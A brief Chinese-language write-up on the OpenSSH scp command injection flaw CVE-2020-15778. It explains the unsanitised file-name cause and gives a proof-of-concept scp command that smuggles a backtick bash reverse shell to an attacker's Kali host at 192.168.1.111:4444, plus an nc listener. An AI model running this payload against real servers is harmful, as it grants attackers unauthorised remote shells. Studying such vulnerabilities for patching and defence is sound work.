OpenSSH的scp命令注入漏洞(CVE-2020-15778)
影響版本:OpenSSH =< 8.3p1
scp 是 secure copy 的縮寫。在linux系統中,scp用於linux之間復制文件和目錄,基於 ssh 登陸進行安全的遠程文件拷貝命令。該命令由openssh的scp.c及其他相關代碼實現。
poc利用:
在向遠程主機拷貝文件時,文件的路徑會追加到本地scp命令后,當執行本地scp命令時,scp不會檢查、過濾和清除文件名。這使得攻擊者執行帶有反引號的有效scp命令時,本地shell還將執行反引號中的命令。
查看OpenSSH的版本
ssh -V
反彈shell:
kali:192.168.1.111
openssh主機:192.168.1.194
scp zwish.php root@192.168.1.194:'`bash -i >& /dev/tcp/192.168.1.111/4444 0>&1`'
kali監聽:nc -lvp 4444
比較雞肋的是需要知道登錄的ssh用戶的密碼。
這里嘗試禁止某個ssh用戶遠程登錄,但他必須經過密碼的身份驗證才能反彈shell,所以可利用的場景實在是想不到
1、網上搜資料說可以在authorized_key文件可以設置允許SCP單不允許SSH實際登陸
2、可能會用在回彈shell